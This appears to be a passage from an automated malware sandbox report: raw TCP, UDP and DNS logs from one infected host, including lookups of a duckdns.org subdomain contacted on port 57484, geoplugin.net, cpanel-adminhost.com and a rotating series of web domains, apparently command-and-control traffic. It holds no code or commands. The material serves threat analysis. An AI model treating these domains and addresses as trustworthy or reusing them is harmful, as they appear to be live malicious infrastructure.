                                                            Aug 28, 2024 14:04:15.257334948 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257344961 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257745981 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257755041 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257761955 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.257771969 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934319019 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934345007 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934350014 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934464931 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934464931 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.934470892 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934483051 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934489965 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934598923 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.934721947 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934727907 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934740067 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.934830904 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:15.939670086 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.939853907 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:15.939938068 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:16.046561003 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.046926975 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.046935081 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.046941042 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.047065973 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:16.047252893 CEST8049760188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:16.047514915 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:16.756951094 CEST4976080192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.776503086 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.782474995 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:17.782690048 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.784651995 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:17.791134119 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:18.440270901 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:18.440397978 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:18.440443039 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:18.444166899 CEST4976180192.168.2.4188.114.96.3
                                                            Aug 28, 2024 14:04:18.452644110 CEST8049761188.114.96.3192.168.2.4
                                                            Aug 28, 2024 14:04:23.497782946 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:23.502670050 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.507682085 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:23.507682085 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:23.512619019 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.975227118 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.975501060 CEST804976234.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:23.975589991 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:24.326359034 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:04:24.328270912 CEST4973857484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:04:24.333976984 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:04:25.022658110 CEST4976280192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.041044950 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.046021938 CEST804976334.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:26.046262980 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.049773932 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:26.054536104 CEST804976334.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:26.541315079 CEST804976334.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:26.541394949 CEST804976334.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:26.541436911 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:27.554071903 CEST4976380192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.572323084 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.577250957 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.577337027 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.579457998 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:28.585113049 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585243940 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585253000 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585259914 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585268974 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585392952 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585402012 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585410118 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:28.585418940 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:29.049917936 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:29.050432920 CEST804976434.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:29.050512075 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:30.085091114 CEST4976480192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.103549004 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.108398914 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.108485937 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.110239029 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.115151882 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.579495907 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.580043077 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:31.580553055 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.582659960 CEST4976580192.168.2.434.149.87.45
                                                            Aug 28, 2024 14:04:31.587441921 CEST804976534.149.87.45192.168.2.4
                                                            Aug 28, 2024 14:04:36.605781078 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:36.610630035 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:36.610717058 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:36.612497091 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:36.617247105 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:38.000725031 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:38.000818014 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:38.116492987 CEST4976680192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:38.121364117 CEST80497663.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.134938002 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:39.139874935 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.139944077 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:39.141765118 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:39.146971941 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.620131969 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:39.621944904 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:40.647686958 CEST4976780192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:40.652704954 CEST80497673.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.665997028 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:41.673358917 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.673799992 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:41.677159071 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:41.682140112 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682146072 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682156086 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682173967 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682178020 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682224989 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.682229996 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.683254004 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:41.683259010 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:42.147622108 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:42.147766113 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:43.179044008 CEST4976880192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:43.183949947 CEST80497683.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.197817087 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.202904940 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.202996016 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.204821110 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.209969044 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.667821884 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.668117046 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:44.668226957 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.674926043 CEST4976980192.168.2.43.33.130.190
                                                            Aug 28, 2024 14:04:44.681942940 CEST80497693.33.130.190192.168.2.4
                                                            Aug 28, 2024 14:04:49.901578903 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:49.906582117 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:49.906668901 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:49.908469915 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:49.913341045 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:51.095119953 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:51.095278978 CEST8049770142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:51.095333099 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:51.413247108 CEST4977080192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:52.432606936 CEST4977180192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:52.437967062 CEST8049771142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:52.438035965 CEST4977180192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:52.440644979 CEST4977180192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:52.446029902 CEST8049771142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:53.282835007 CEST8049771142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:53.283516884 CEST8049771142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:53.283615112 CEST4977180192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:53.945833921 CEST4977180192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:54.373491049 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:04:54.375338078 CEST4973857484192.168.2.4172.111.137.132
                                                            Aug 28, 2024 14:04:54.384243965 CEST5748449738172.111.137.132192.168.2.4
                                                            Aug 28, 2024 14:04:54.963156939 CEST4977280192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:54.970845938 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.970943928 CEST4977280192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:54.973089933 CEST4977280192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:54.978076935 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978090048 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978096962 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978327036 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978462934 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978471994 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978629112 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978638887 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:54.978641987 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:55.817486048 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:55.818305016 CEST8049772142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:55.821968079 CEST4977280192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:56.476066113 CEST4977280192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:57.494559050 CEST4977380192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:57.499845028 CEST8049773142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:57.500050068 CEST4977380192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:57.501735926 CEST4977380192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:57.507227898 CEST8049773142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:58.729914904 CEST8049773142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:58.730149984 CEST8049773142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:04:58.730195045 CEST4977380192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:58.732712984 CEST4977380192.168.2.4142.250.186.147
                                                            Aug 28, 2024 14:04:58.740299940 CEST8049773142.250.186.147192.168.2.4
                                                            Aug 28, 2024 14:05:04.180114031 CEST4977480192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:04.189026117 CEST8049774203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:04.189908981 CEST4977480192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:04.191656113 CEST4977480192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:04.198338985 CEST8049774203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:04.819679022 CEST8049774203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:04.819696903 CEST8049774203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:04.819789886 CEST4977480192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:05.694740057 CEST4977480192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:06.713886023 CEST4977580192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:06.718915939 CEST8049775203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:06.719172955 CEST4977580192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:06.721204042 CEST4977580192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:06.727803946 CEST8049775203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:07.326870918 CEST8049775203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:07.328321934 CEST8049775203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:07.328378916 CEST4977580192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:08.225851059 CEST4977580192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:09.244163990 CEST4977680192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:09.249456882 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.250026941 CEST4977680192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:09.252142906 CEST4977680192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:09.257117987 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257220030 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257236958 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257241964 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257266045 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257322073 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257375956 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257379055 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.257384062 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.964644909 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.964663029 CEST8049776203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:09.964721918 CEST4977680192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:10.757101059 CEST4977680192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:11.775708914 CEST4977780192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:11.780622959 CEST8049777203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:11.780836105 CEST4977780192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:11.782677889 CEST4977780192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:11.790293932 CEST8049777203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:12.408523083 CEST8049777203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:12.409252882 CEST8049777203.161.41.205192.168.2.4
                                                            Aug 28, 2024 14:05:12.409302950 CEST4977780192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:12.411117077 CEST4977780192.168.2.4203.161.41.205
                                                            Aug 28, 2024 14:05:12.415903091 CEST8049777203.161.41.205192.168.2.4

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Aug 28, 2024 14:01:11.392865896 CEST5683453192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:01:11.409470081 CEST53568341.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:01:53.363734007 CEST5755453192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:01:54.366015911 CEST5755453192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:01:54.994407892 CEST53575541.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:01:54.995183945 CEST53575541.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:01:56.038767099 CEST5923053192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:01:56.046408892 CEST53592301.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:02:00.408345938 CEST5604753192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:02:00.421741009 CEST53560471.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:03:08.439939022 CEST5057553192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:03:08.473172903 CEST53505751.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:03:24.011481047 CEST5903653192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:03:24.362660885 CEST53590361.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:03:42.619318008 CEST5662053192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:03:42.631748915 CEST53566201.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:03:55.855211973 CEST6410053192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:03:56.032749891 CEST53641001.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:04:10.121747971 CEST5612653192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:04:10.181997061 CEST53561261.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:04:23.449765921 CEST5373553192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:04:23.489950895 CEST53537351.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:04:36.589979887 CEST5933853192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:04:36.603564978 CEST53593381.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:04:49.681910992 CEST5354153192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:04:49.899410963 CEST53535411.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:05:03.744503975 CEST5406053192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:05:04.176655054 CEST53540601.1.1.1192.168.2.4
                                                            Aug 28, 2024 14:05:17.932250023 CEST5686553192.168.2.41.1.1.1
                                                            Aug 28, 2024 14:05:18.439898968 CEST53568651.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Aug 28, 2024 14:01:11.392865896 CEST192.168.2.41.1.1.10x46d8Standard query (0)avocaldoperu.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:01:53.363734007 CEST192.168.2.41.1.1.10x3957Standard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:01:54.366015911 CEST192.168.2.41.1.1.10x3957Standard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:01:56.038767099 CEST192.168.2.41.1.1.10x90feStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:02:00.408345938 CEST192.168.2.41.1.1.10x27adStandard query (0)cpanel-adminhost.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:08.439939022 CEST192.168.2.41.1.1.10x5050Standard query (0)www.ctorq.netA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:24.011481047 CEST192.168.2.41.1.1.10xa88Standard query (0)www.vendasnaweb1.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:42.619318008 CEST192.168.2.41.1.1.10xa467Standard query (0)www.411divorce.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:55.855211973 CEST192.168.2.41.1.1.10x463cStandard query (0)www.gtprivatewealth.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:10.121747971 CEST192.168.2.41.1.1.10xd9eStandard query (0)www.katasoo.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:23.449765921 CEST192.168.2.41.1.1.10xd285Standard query (0)www.martinminorgroup.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:36.589979887 CEST192.168.2.41.1.1.10x853bStandard query (0)www.atlpicsstudios.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:49.681910992 CEST192.168.2.41.1.1.10xaa21Standard query (0)www.openhandedvision.comA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:05:03.744503975 CEST192.168.2.41.1.1.10x2b2eStandard query (0)www.shabygreen.topA (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:05:17.932250023 CEST192.168.2.41.1.1.10x4b57Standard query (0)www.kera333.orgA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Aug 28, 2024 14:01:11.409470081 CEST1.1.1.1192.168.2.40x46d8No error (0)avocaldoperu.com104.21.62.202A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:01:11.409470081 CEST1.1.1.1192.168.2.40x46d8No error (0)avocaldoperu.com172.67.138.232A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:01:54.994407892 CEST1.1.1.1192.168.2.40x3957No error (0)iwarsut775laudrye2.duckdns.org172.111.137.132A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:01:54.995183945 CEST1.1.1.1192.168.2.40x3957No error (0)iwarsut775laudrye2.duckdns.org172.111.137.132A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:01:56.046408892 CEST1.1.1.1192.168.2.40x90feNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:02:00.421741009 CEST1.1.1.1192.168.2.40x27adNo error (0)cpanel-adminhost.com193.25.216.165A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:08.473172903 CEST1.1.1.1192.168.2.40x5050No error (0)www.ctorq.netctorq.netCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:03:08.473172903 CEST1.1.1.1192.168.2.40x5050No error (0)ctorq.net3.33.130.190A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:08.473172903 CEST1.1.1.1192.168.2.40x5050No error (0)ctorq.net15.197.148.33A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:24.362660885 CEST1.1.1.1192.168.2.40xa88No error (0)www.vendasnaweb1.comvendasnaweb1.comCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:03:24.362660885 CEST1.1.1.1192.168.2.40xa88No error (0)vendasnaweb1.com162.241.2.92A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:42.631748915 CEST1.1.1.1192.168.2.40xa467No error (0)www.411divorce.com411divorce.comCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:03:42.631748915 CEST1.1.1.1192.168.2.40xa467No error (0)411divorce.com5.78.41.174A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:56.032749891 CEST1.1.1.1192.168.2.40x463cNo error (0)www.gtprivatewealth.comgtprivatewealth.comCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:03:56.032749891 CEST1.1.1.1192.168.2.40x463cNo error (0)gtprivatewealth.com3.33.130.190A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:03:56.032749891 CEST1.1.1.1192.168.2.40x463cNo error (0)gtprivatewealth.com15.197.148.33A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:10.181997061 CEST1.1.1.1192.168.2.40xd9eNo error (0)www.katasoo.com188.114.96.3A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:10.181997061 CEST1.1.1.1192.168.2.40xd9eNo error (0)www.katasoo.com188.114.97.3A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:23.489950895 CEST1.1.1.1192.168.2.40xd285No error (0)www.martinminorgroup.compointing.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:04:23.489950895 CEST1.1.1.1192.168.2.40xd285No error (0)pointing.wixdns.netcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:04:23.489950895 CEST1.1.1.1192.168.2.40xd285No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:04:23.489950895 CEST1.1.1.1192.168.2.40xd285No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:36.603564978 CEST1.1.1.1192.168.2.40x853bNo error (0)www.atlpicsstudios.comatlpicsstudios.comCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:04:36.603564978 CEST1.1.1.1192.168.2.40x853bNo error (0)atlpicsstudios.com3.33.130.190A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:36.603564978 CEST1.1.1.1192.168.2.40x853bNo error (0)atlpicsstudios.com15.197.148.33A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:04:49.899410963 CEST1.1.1.1192.168.2.40xaa21No error (0)www.openhandedvision.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
